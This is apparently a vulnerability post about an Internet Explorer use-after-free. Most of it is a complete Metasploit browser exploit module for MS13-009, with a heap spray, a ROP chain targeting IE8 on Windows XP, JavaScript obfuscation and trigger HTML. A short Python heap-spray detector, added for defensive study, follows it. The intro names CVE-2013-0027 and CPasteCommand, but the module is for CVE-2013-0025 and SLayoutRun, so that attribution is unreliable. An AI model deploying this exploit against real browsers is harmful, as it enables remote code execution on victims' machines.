Microsoft Internet Explorer has a use-after-free bug in its handling of CPasteComma. An attacker can build a malicious web page and lure a user into rendering it, which allows arbitrary code execution in the context of the application. The CVE identifier is CVE-2013-0027; the affected versions are as follows:
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6
Metasploit has already published a corresponding exploit module, reproduced below:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a CParaElement node is released but a reference is still kept
        in CDoc. This memory is reused when a CDoc relayout is performed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>'  # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0025' ],
          [ 'MSB', 'MS13-009' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'Space'           => 920,
          'DisableNops'     => true,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff"  # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    # If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_nops = [0x77c39f92].pack("V") * 11  # RETN
      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
      rop_payload << rop_nops
      rop_payload << [0x77c364d5].pack("V")  # POP EBP # RETN
      rop_payload << [0x77c15ed5].pack("V")  # XCHG EAX,ESP # RETN
      rop_payload << [0x77c35459].pack("V")  # PUSH ESP # RETN
      rop_payload << [0x77c39f92].pack("V")  # RETN
      rop_payload << [0x0c0c0c8c].pack("V")  # Shellcode offset
      rop_payload << code
    end

    return rop_payload
  end

  def get_exploit(my_target, cli)
    p  = get_payload(my_target, cli)
    js = heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    </script>
    <script>
    var data;
    var objArray = new Array(1150);
    setTimeout(function(){
      document.body.style.whiteSpace = "pre-line";
      CollectGarbage();
      for (var i=0; i<1150; i++) {
        objArray[i] = document.createElement('div');
        objArray[i].className = data += unescape("%u0c0c%u0c0c");
      }
      setTimeout(function(){document.body.innerHTML = "boo"}, 100)
    }, 100)
    </script>
    </head>
    <body>
    <p></p>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')

    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
end
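As an added example (not part of the original post or of the Metasploit module above), a small Python content-inspection heuristic that flags HTML responses carrying the heap-spray pattern the module generates: a 0x0c0c0c0c sled built with unescape(), self-doubling string growth, a bulk heapLib-style allocation loop, and a forced CollectGarbage() call. The indicator names, the threshold and the two sample bodies are constructed for illustration and are not signatures from any real product.

```python
import re

# Heuristic indicators of the IE heap-spray technique used by the MS13-009 module.
# Each is a regex over the raw response body; counts are reported per indicator.
INDICATORS = {
    # unescape("%u0c0c%u0c0c...") - the 0x0c0c0c0c nop sled in %u form
    "nop_sled_unescape": re.compile(
        r'unescape\(\s*["\'](?:%u0c0c){2,}["\']\s*\)', re.I),
    # while (x.length < 0xNNNN) x += x;  - exponential string growth
    "doubling_loop": re.compile(
        r'while\s*\(\s*(\w+)\.length\s*<\s*0x[0-9a-f]+\s*\)\s*\1\s*\+=\s*\1', re.I),
    # for (... 0xNNN ...) { obj.alloc(  - bulk allocation of the spray block
    "spray_alloc_loop": re.compile(
        r'for\s*\([^)]*0x[0-9a-f]{3,}[^)]*\)\s*\{\s*\w+\.alloc\(', re.I),
    # explicit garbage collection, used to free the object before reuse
    "collect_garbage": re.compile(r'\bCollectGarbage\s*\(\s*\)', re.I),
}


def scan_html(body: str) -> dict:
    """Return {indicator_name: hit_count} for every indicator present in body."""
    hits = {}
    for name, rx in INDICATORS.items():
        n = len(rx.findall(body))
        if n:
            hits[name] = n
    return hits


def is_suspicious(body: str, min_indicators: int = 3) -> bool:
    """Flag only when several distinct indicators co-occur: a doubling loop or a
    CollectGarbage() call on its own is common in benign scripts."""
    return len(scan_html(body)) >= min_indicators


# Constructed sample mimicking the spray section of the module's output.
SAMPLE_SPRAY = """<script>
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x80000) nops += nops;
var shellcode = nops.substring(0, 0x5f4) + code;
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); }
CollectGarbage();
</script>"""

# Constructed benign page: two weak indicators, but no sled and no spray loop.
SAMPLE_BENIGN = '<script>var s = "a"; while (s.length < 0x10) s += s; CollectGarbage();</script>'
```

scan_html() on SAMPLE_SPRAY reports all four indicators (two doubling loops), while SAMPLE_BENIGN trips only two and stays below the threshold.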
Microsoft security bulletin and patch: https://technet.microsoft.com/en-us/security/bulletin/ms13-009